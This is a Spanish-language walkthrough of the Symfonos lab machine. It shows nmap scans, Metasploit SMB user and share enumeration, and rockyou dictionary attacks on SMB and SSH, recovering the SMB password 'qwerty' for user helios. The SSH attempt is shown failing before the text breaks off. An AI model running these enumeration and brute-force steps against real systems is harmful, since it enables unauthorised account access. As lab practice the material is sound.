Symfonos
resumen en portada
em50l@jejo.es$
em50l@jejo.es$ nmap -sC -A 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:29 CEST PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.4.25 ((Debian)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) OS: Windows 6.1 (Samba 4.5.16-Debian) Computer name: symfonos account_used: guest authentication_level: user
Busqueda carpetas http:
em50l@jejo.es$ nmap 192.168.56.101 -p 80 --script http-enum Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:23 CEST Nmap scan report for 192.168.56.101 Host is up (0.00054s latency). PORT STATE SERVICE 80/tcp open http | http-enum: |_ /manual/: Potentially interesting folder Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
Informacion Usuarios:
msf5 > use auxiliary/scanner/smb/smb_enumusers (reverse-i-search)`': setg Interrupt: use the 'exit' command to quit msf5 auxiliary(scanner/smb/smb_enumusers) > setg rhosts 192.168.56.101 rhosts => 192.168.56.101 msf5 auxiliary(scanner/smb/smb_enumusers) > run [+] 192.168.56.101:139 - SYMFONOS [ helios ] ( LockoutTries=0 PasswordMin=5 ) [*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
msf5> use auxiliary/scanner/smb/smb_lookupsid msf5 auxiliary(scanner/smb/smb_lookupsid) > run [*] 192.168.56.101:139 - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - ) [*] 192.168.56.101:139 - USER=nobody RID=501 [*] 192.168.56.101:445 - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - ) [*] 192.168.56.101:445 - USER=nobody RID=501 [*] 192.168.56.101:445 - GROUP=None RID=513 [*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
msf5 > use auxiliary/scanner/smb/smb_enumshares msf5 auxiliary(scanner/smb/smb_enumshares) > run [+] 192.168.56.101:139 - print$ - (DS) Printer Drivers [+] 192.168.56.101:139 - helios - (DS) Helios personal share [+] 192.168.56.101:139 - anonymous - (DS) [+] 192.168.56.101:139 - IPC$ - (I) IPC Service (Samba 4.5.16-Debian) [*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Si navego a la URL smb://192.168.56.101/
veo lo mismo.
Un ataque de diccionario a smb????
msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > show options Module options (auxiliary/scanner/smb/smb_login): ... ... ... msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.56.101 msf5 auxiliary(scanner/smb/smb_login) > set smbuser helios msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/wordlists/rockyou.txt msf5 auxiliary(scanner/smb/smb_login) > run [*] 192.168.56.101:445 - 192.168.56.101:445 - Starting SMB login bruteforce [-] 192.168.56.101:445 - 192.168.56.101:445 - Failed: '.\helios:123456', [-] 192.168.56.101:445 - 192.168.56.101:445 - Failed: '.\helios:ashley', ... ... [+] 192.168.56.101:445 - 192.168.56.101:445 - Success: '.\helios:qwerty' ^C[*] 192.168.56.101:445 - Caught interrupt from the console... [*] Auxiliary module execution completed
Un ataque de diccionario a ssh???.
msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > show optionsSin resultado..Module options (auxiliary/scanner/ssh/ssh_login): … … … msf5 auxiliary(scanner/ssh/ssh_login) > set username helios msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/rockyou.txt msf5 auxiliary(scanner/ssh/ssh_login) > run ^C [] Caught interrupt from the console… [] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_login) > set verbose yes msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.56.101:22 - Failed: 'helios:123456' [-] 192.168.56.101:22 - Failed: 'helios:12345' [-] 192.168.56.101:22 - Failed: 'helios:123456789' [-] 192.168.56.101:22 - Failed: 'helios:password' [-] 192.168.56.101:22 - Failed: 'helios:iloveyou' [-] … [-] … [-] …